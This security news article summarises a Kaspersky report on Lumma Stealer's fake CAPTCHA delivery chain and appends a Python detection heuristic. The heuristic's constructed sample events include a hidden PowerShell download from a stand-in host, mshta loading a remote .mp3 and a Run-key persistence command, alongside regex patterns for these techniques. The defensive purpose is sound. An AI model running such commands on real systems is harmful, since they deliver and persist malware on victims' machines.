
Fake CAPTCHA distribution scheme | Image: Kaspersky
The cybercriminal landscape is constantly evolving, with Malware-as-a-Service (MaaS) lowering the bar for entry and information stealers becoming a lucrative commodity. Among these threats, the Lumma Stealer has emerged as a particularly sophisticated player since its introduction in 2022 by the threat actor known as Lumma.
Initially marketed as LummaC2, this information stealer quickly gained traction in underground forums, with prices starting at $250. Its presence on dark web marketplaces and Telegram channels continues to grow; as of March 2025, it has over a thousand active subscribers. Lumma Stealer has become a commercially successful product in the underground economy.
While Lumma Stealer uses many traditional phishing vectors, Kaspersky’s Global Emergency Response Team (GERT) uncovered a particularly deceptive delivery method — fake CAPTCHA pages. These fraudulent pages mimic Google reCAPTCHA or Cloudflare challenges and are often hosted on cloned pirated content or cryptocurrency-related websites.
“Users are prompted to complete an identity verification via a fraudulent ‘Safeguard Captcha’ bot,” which tricks them into executing a malicious command copied to their clipboard.
With a few clicks — typically involving Win+R, Ctrl+V, and Enter — unsuspecting users run a PowerShell command that initiates Lumma’s infection chain. The command downloads an encoded payload from seemingly legitimate CDNs and kicks off the malware deployment process.
What makes Lumma particularly difficult to detect is the complexity of its infection chain. The initial command downloads a .zip file, extracts the malware, and achieves persistence by registering itself under the Windows Registry Run key.
In more advanced attacks, the malware is hidden inside what appears to be .mp3 or .png files, triggered via the mshta.exe HTML application engine. The JavaScript inside these files builds and executes obfuscated PowerShell scripts which eventually download a massive (~31MB) payload (firefire.png) containing multiple layers of encryption, anti-debugging techniques, and detection evasion mechanisms.
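As an added illustration (not code from the Kaspersky report), the following Python heuristic runs over constructed Sysmon-style process-creation events and flags the three observable steps of the chain described above: a shell spawned by explorer.exe (which is what a Win+R paste-and-run produces) carrying download or hidden-window switches, mshta.exe pointed at a file that is not an .hta, and a Run-key registration. The event field names, paths and the cdn.example.invalid host are assumptions made for the example.

```python
"""Heuristic detection for the fake-CAPTCHA delivery chain described above,
run over constructed, Sysmon-style process-creation events (Event ID 1)."""
import re

# Constructed sample events (assumed normalised fields; not from the report).
SAMPLE_EVENTS = [
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell -w hidden -c \"iwr https://cdn.example.invalid/p.zip -OutFile $env:TEMP\\p.zip\""},
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": "mshta https://cdn.example.invalid/media/track.mp3"},
    {"parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\reg.exe",
     "cmdline": "reg add HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run /v Updater /d \"%APPDATA%\\u.exe\""},
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\notepad.exe",
     "cmdline": "notepad.exe notes.txt"},
    {"parent": r"C:\Program Files\Git\git-bash.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell -File build.ps1"},
]

SHELLS = ("powershell.exe", "pwsh.exe", "cmd.exe")
DOWNLOAD_RE = re.compile(r"(?i)(iwr|invoke-webrequest|downloadstring|downloadfile|curl|https?://)")
HIDDEN_RE = re.compile(r"(?i)(-w(indowstyle)?\s+hidden|-e(nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,})")
# mshta handed a media/text extension instead of an .hta: a masqueraded HTA payload
MSHTA_MEDIA_RE = re.compile(r"(?i)\.(mp3|png|jpg|gif|txt)\b")
RUN_KEY_RE = re.compile(r"(?i)\\CurrentVersion\\Run\b")

def classify(ev):
    """Return the names of the heuristics an event matches (empty if none)."""
    hits = []
    image = ev["image"].lower().rsplit("\\", 1)[-1]
    parent = ev["parent"].lower().rsplit("\\", 1)[-1]
    cmd = ev["cmdline"]
    # The Run dialog (Win+R) launches its child under explorer.exe
    if parent == "explorer.exe" and image in SHELLS and (DOWNLOAD_RE.search(cmd) or HIDDEN_RE.search(cmd)):
        hits.append("explorer_spawned_downloader_shell")
    if image == "mshta.exe" and MSHTA_MEDIA_RE.search(cmd):
        hits.append("mshta_non_hta_payload")
    if image == "reg.exe" and RUN_KEY_RE.search(cmd):
        hits.append("run_key_persistence")
    return hits

def scan(events):
    """Map each event index to its matching heuristics, skipping clean events."""
    return {i: hits for i, ev in enumerate(events) if (hits := classify(ev))}
```

Each heuristic alone will produce noise in a developer-heavy estate; the chain signal comes from seeing them in sequence on one host within a short window.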
Lumma’s creators are adept at abusing trusted systems. The malware is often injected into:
- Overlay sections of legitimate applications
- DLLs sideloaded by vulnerable software
In one case, the stealer was bundled with a self-extracting RAR archive posing as a legitimate file named ProjectorNebraska.exe. Upon execution, the payload drops AutoIt fragments, scripts, and a batch loader (Hose.cmd) that reassembles and runs the final stealer payload.
The batch script performs sandbox evasion, disables antivirus monitoring, and crafts the final malicious executable by merging seemingly unrelated files. From there, an obfuscated AutoIt script dynamically injects and executes shellcode in memory to deliver the stealer.
“The script dynamically selects 32-bit or 64-bit shellcode… and executes the second-stage payload, decrypted with RC4 and compressed with LZNT1.”
Once active, Lumma Stealer hunts for sensitive data, including:
- Cryptocurrency wallet credentials (e.g., MetaMask, Binance)
- 2FA codes from authenticator extensions
- Browser-stored passwords and cookies
- Credentials from AnyDesk, KeePass, and other remote tools
- Financial data like credit card information
The stolen information is then transmitted via encrypted HTTP/HTTPS POST requests to attacker-controlled C2 domains like reinforcenh[.]shop, drawzhotdog[.]shop, and several others identified in the investigation.
“Although individuals are the primary targets of these attacks, we saw Lumma in an incident at one of our customers,” Kaspersky reported, underscoring the growing threat to businesses.
The implications are vast. What begins as a simple case of credential theft may escalate into full-scale breaches or be monetized through ransomware groups — a common progression in the cybercrime lifecycle.